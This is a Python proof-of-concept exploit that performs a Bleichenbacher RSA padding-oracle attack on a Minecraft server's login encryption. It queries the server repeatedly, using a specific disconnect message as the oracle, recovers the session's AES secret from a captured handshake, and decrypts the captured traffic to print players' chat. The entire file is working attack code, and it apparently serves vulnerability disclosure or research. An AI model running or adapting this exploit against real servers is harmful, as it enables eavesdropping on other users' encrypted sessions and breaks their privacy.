#!/usr/bin/env python
# needs cryptodome for RSA: pip3 install cryptodome

import ctypes
import io
import secrets
import struct
import sys
import time
import yaml
import zlib
from base64 import b64decode
from collections import deque
from random import randrange
from socket import socket

from Crypto.Cipher import PKCS1_v1_5, AES
from Crypto.Math.Numbers import Integer
from Crypto.PublicKey import RSA
from Crypto.Util.number import bytes_to_long, long_to_bytes, ceil_div
import Crypto.Util.number

user = b'bleichenbacher'
counter = 0

def readVarInt(b, proc=lambda x: x.read(1), cipher=None):
    i = 0
    n_bytes = 0
    while True:
        byte = proc(b)
        if not byte:
            return None
        if cipher:
            byte = cipher.decrypt(byte)
        byte = byte[0]
        i |= (byte & 0x7f) << (7 * n_bytes)
        n_bytes += 1
        if byte & 0x80 == 0:
            break
        if n_bytes > 5:
            return None
    return i

def recvVarInt(b):
    return readVarInt(b, lambda x: x.recv(1))

def writeVarInt(i):
    b = []
    i = ctypes.c_uint(i).value
    while True:
        byte = i & 0x7f
        i >>= 7
        b.append(byte | (0x80 if i > 0 else 0))
        if i == 0:
            break
    return bytes(b)

def writeString(s):
    return writeVarInt(len(s)) + s

def readString(b):
    return b.read(readVarInt(b))

def createPacket(packet_id, data):
    data = writeVarInt(packet_id) + data
    return writeVarInt(len(data)) + data

def recvPacket(sock):
    # Uncompressed packet format
    length = recvVarInt(sock)
    if not length:
        return (-1, io.BytesIO(b''))
    data = io.BytesIO(sock.recv(min(length, 0x1000)))
    return (readVarInt(data), data)

def readPacket(b, ct=-1, cipher=None):
    if cipher:
        length = readVarInt(b, cipher=cipher)
    else:
        length = readVarInt(b)
    
    if not length:
        return (-1, io.BytesIO(b''))

    data = b.read(length)
    if cipher:
        data = cipher.decrypt(data)
    data = io.BytesIO(data)

    if ct > -1:
        data_length = readVarInt(data)
        if data_length > 0:
            decompressor = zlib.decompressobj()
            data = decompressor.decompress(data.read())
            assert(len(data) == data_length)
            data = io.BytesIO(data)
    packet_id = readVarInt(data)
    return (packet_id, data)

def cHandshake(version, addr, port, next_state):
    return createPacket(0x00, writeVarInt(version) + writeString(addr) + struct.pack('!H', port) + writeVarInt(next_state))

def cRequest():
    return createPacket(0x00, b'')

def cPing(long):
    return createPacket(0x01, struct.pack('!q', long))

def cLoginStart(username):
    return createPacket(0x00, writeString(username))

def cEncryptionResponse(secret, vt):
    return createPacket(0x01, writeString(secret) + writeString(vt))

def sEncryptionRequest(data):
    server_id = readString(data)
    pk = data.read(readVarInt(data))
    vt = data.read(readVarInt(data))
    return pk, vt

def getKey(addr, port):
    sock = socket()
    sock.connect((addr, port))

    sock.send(cHandshake(753, addr, port, 0x02))
    sock.send(cLoginStart(user))
    pk, vt = sEncryptionRequest(recvPacket(sock)[1])

    key = RSA.importKey(pk)
    cipher = PKCS1_v1_5.new(key)

    sock.close()
    return key, cipher

def splitter(packets, pred):
    yes, no = [], []
    for p in packets:
        if pred(p):
            yes.append(p)
        else:
            no.append(p)
    return (yes, no)

def interval(a,b):
    return range(a, b + 1)

def ceildiv(a,b):
    return -(-a // b)

def floordiv(a,b):
    return a // b

def bleichenbacher(addr, port, ciphertext):
    key, cipher = getKey(addr, port)

    c = Integer(PKCS1_v1_5.bytes_to_long(ciphertext))
    k = key.size_in_bytes()
    n = int(key.n)

    B = pow(2, 8 * (k - 2))
    B2 = 2 * B
    B3 = B2 + B

    m_old = {(B2, B3 - 1)}
    i = 1

    search_space = 0
    for a, b in m_old:
        search_space += b - a
    entropy = 1024 - search_space.bit_length()
    print('\rCalculated %d/1024 bits...' % entropy, end='')

    s_old = 0
    while True:
        if i == 1:
            s_new = ceildiv(n, B3)
            while not oracle(addr, port, key, cipher, c, s_new, k):
                s_new += 1

        elif i > 1 and len(m_old) >= 2:
            s_new = s_old + 1
            while not oracle(addr, port, key, cipher, c, s_new, k):
                s_new += 1

        elif len(m_old) == 1:
            a, b = next(iter(m_old))
            found = False
            r = ceildiv(2 * (b * s_old - B2), n)
            while not found:
                for s in interval(ceildiv(B2 + r * n, b), floordiv(B3 - 1 + r * n, a)):
                    if oracle(addr, port, key, cipher, c, s, k):
                        found = True
                        s_new = s
                        break
                r += 1

        m_new = set()
        for a, b in m_old:
            r_min = ceildiv(a * s_new - B3 + 1, n)
            r_max = floordiv(b * s_new - B2, n)
            for r in interval(r_min, r_max):
                new_lb = max(a, ceildiv(B2 + r * n, s_new))
                new_ub = min(b, floordiv(B3 - 1 + r * n, s_new))
                if new_lb <= new_ub:
                    m_new |= {(new_lb, new_ub)}

        search_space = 0
        for a,b in m_new:
            search_space += b - a
        entropy = 1024 - search_space.bit_length()
        print('\rCalculated %d/1024 bits...' % entropy, end='')

        if len(m_new) == 0:
            print()
            return None
        elif len(m_new) == 1:
            a, b = next(iter(m_new))
            if a == b:
                print()
                return a

        i += 1
        s_old = s_new
        m_old = m_new

def oracle(addr, port, key, cipher, c, s, k):
    global counter

    sock = socket()
    sock.connect((addr, port))

    sock.send(cHandshake(753, addr, port, 0x02))
    sock.send(cLoginStart(user))
    pk, vt = sEncryptionRequest(recvPacket(sock)[1])

    c_prime = PKCS1_v1_5.long_to_bytes(c * pow(Integer(s), key.e, key.n) % key.n, k)
    verify_token = cipher.encrypt(vt)

    counter += 1
    sock.send(cEncryptionResponse(c_prime, verify_token))
    packet_id, p = recvPacket(sock)
    return p.read() != b'|{"translate":"disconnect.genericReason","with":["Internal Exception: java.lang.IllegalArgumentException: Missing argument"]}'

def main():
    if len(sys.argv) == 1:
        print('Usage: ./poc.py packet_file [key]')
        return

    packets = yaml.safe_load(open(sys.argv[1])).items()
    client, server = splitter(packets, lambda x: x[0].startswith('peer0'))
    client = io.BytesIO(b''.join(map(lambda x: x[1], client)))
    server = io.BytesIO(b''.join(map(lambda x: x[1], server)))

    readPacket(client) # cHandshake
    packet_id, client_hello = readPacket(client) # cLoginStart
    client_username = readString(client_hello).decode('utf-8')
    assert(packet_id == 0x00)

    readPacket(server) # sEncryptionRequest
    packet_id, encrypt_response = readPacket(client) # cEncryptionResponse
    assert(packet_id == 0x01)

    if len(sys.argv) > 2:
        key = long_to_bytes(int(sys.argv[2], 16))
    else:
        ciphertext = readString(encrypt_response)
        verify_token = readString(encrypt_response)

        assert(len(ciphertext) == 128)
        assert(len(verify_token) == 128)

        # TODO: Switch to argv/argparser
        addr = b'127.0.0.1'
        port = 25565

        print('Breaking shared secret... (this may take a while!)')
        t = time.monotonic()
        m = bleichenbacher(addr, port, ciphertext)
        if not m:
            print("Failed to break secret.")
            return

        # Our secret key is the last 16 bytes of m
        key = long_to_bytes(m)[-16:]
        print('Found secret in %d seconds (%d calls to oracle)' % (time.monotonic() - t, counter))

    print('Using secret: 0x%s' % key.hex())
    print('Decrypting packets for %s:' % client_username)

    decrypted, chat, hidden = 0, 0, 0
    ct = -1
    client_cipher = AES.new(key, iv=key, mode=AES.MODE_CFB)
    server_cipher = AES.new(key, iv=key, mode=AES.MODE_CFB)
    for peer, _ in packets:
        if peer.startswith('peer0'): # client
            packet_id, p = readPacket(client, ct=ct, cipher=client_cipher)
        else: # server
            packet_id, p = readPacket(server, ct=ct, cipher=server_cipher)

        if peer.startswith('peer0'):
            if packet_id == 0x03: # cChatMessage
                chat_msg = readString(p).decode('utf-8')
                print('%s> %s' % (client_username, chat_msg))
                chat += 1
            else:
                hidden += 1
        else:
            if packet_id == 0x03: # sSetCompression
                ct = readVarInt(p)
            elif packet_id == 0x0e: # sChatMessage
                print(readString(p).decode('utf-8'))
                chat += 1
            else:
                hidden += 1
        decrypted += 1

    print('Decrypted %d packets (%d chat, %d not shown)' % (decrypted, chat, hidden))

if __name__ == '__main__':
    main()
